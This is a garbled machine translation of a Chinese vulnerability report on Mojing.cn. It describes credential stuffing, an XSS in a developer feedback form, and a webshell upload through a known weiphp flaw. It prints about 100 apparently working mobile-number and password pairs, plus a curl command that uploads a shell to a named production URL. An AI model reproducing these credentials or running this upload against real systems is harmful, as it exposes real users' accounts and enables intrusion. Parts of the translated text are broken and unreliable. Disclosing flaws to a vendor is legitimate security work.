漏洞标题 Storm镜像多漏洞包(collision library/xss/getshell) 相关制造商 Mojing.cn 漏洞作者 千机 提交时间 2016-05-04 15: 36 公共时间 2016-06-18 15: 40 漏洞类型 成功入侵 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 的Webshell 漏洞详细信息 首先是打到图书馆并成功淘汰了很多账户。 未完成的登录次数和验证码处理
Payload1Payload2Length 13846177646sdhoujie01887 18180093239wan6290012884 13123276688ninng183882 1373702636219770625876 18291957456zyh262509876 15577110761Dc19880717876 18633762327nnd86amc874 13721477762aini1314872 18576432432qq6935868871 15659931773hedaoqin55868 13897463679w96104216868 18965665560whf214145868 135555424010325511y868 18245301237z6521426868 138302891231116qiyang861 1895245504719881120860 18020733707fs0408039860 15651767055198566860 186411916605624110860 13915528614Lh7758521860 18735376992lxx4424586860 13336920317a65476298860 18628278998yang6638253860 18571471440ps13388860 15241766922shishuai21860 13581522846asdf888860 18883286082a43630642860 15800295032a123456860 13676799770wsczh0418860 13883649807c83399780860 13429232187hzj1993523855 15264728945qq4252426854 13777274896w8892w63852 189681807261714131211852 13846071539wj584521852 137603416946209321852 13770914589zhang1984852 138192723231925852625852 15959025900ilovebin852 1326422881177582589a852 18621600258qcx282852 1503041256311111a848 15961078309q8614789848 189771505566841698845 18078275817qq4366456844 15982557785lixinxing844 1851182112161428202844 18934311307liyi801219844 15129190467watzx1314842 15986989274xwh5201314841 1529231987920052134840 1516675095919970721840 15642877000760219840 13865041970zjmzzl123840 15775822345520wenjie840 13523649911zhouyuan77840 13736491447992892323840 18013730125yinlei520840 13549850518830614840 1342437736919840420840 13241814968zmsx11840 13877336700ssdy931422840 13600893906z8356056840 13525127305www123456840 13728072746a5362257840 15988438505lxj620840 18357363092jy19900820839 18694049554q543203447839 13099898899zxcv1234839 13241233214sn6331907838 13834904042jj19810427838 13738073127alex1123838 15250581862ai198797838 13717788554197951838 13410105357a8895578838 15800616740134679838 13722050101364762298838 18621704979weed00838 156290821351988927zs838 13658502233xushaoyuna838 18805727654yk890102838 1527794026211121314a838 15073389123a250275701838 15018514831swsw000838 1807311512519841224o838 13784035359ch820714838 15961765073a9880630838 136987123313434158lyf838 139197917501990127ybs838 18621891698liwei1981838 13378120671qw27764991838 132230765708853qq837 1593522990919862188a836 13728444422a2639902836 186263185073391929835 1568213800595ll10835 150300913775461628835 13817798135zsh123835 13828084568hjj619000835 18377906611lby199061835 13846467035wwkfghy520835 15653811505gao123456834 13872839824123a123a834 134228984537333133833 13874408393zl810315833 这些帐户可以登录
那么xss, 出现在Mirror Developer Platform的反馈部分 http://open.mojing.cn/developer/feedback/submit
然后gethell,这已经很久了,并且学会了新的姿势 http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html 这个背景是用weiphp开发的 请参阅此漏洞 WooYun: weiphp3.0微信开发框架前端getshell第二弹(无需登录) 首先在本地获取一个shell文件
然后通过以下命令上传shell 卷曲-F'[电子邮件 保护]/*'http://weixin.mojing.cn/index.php?s=/Home/File/uploadPicture/ 成功上传shell
漏洞证明:
修理计划: 改变和改变 版权声明:请注明出处。成千上万的机器@乌云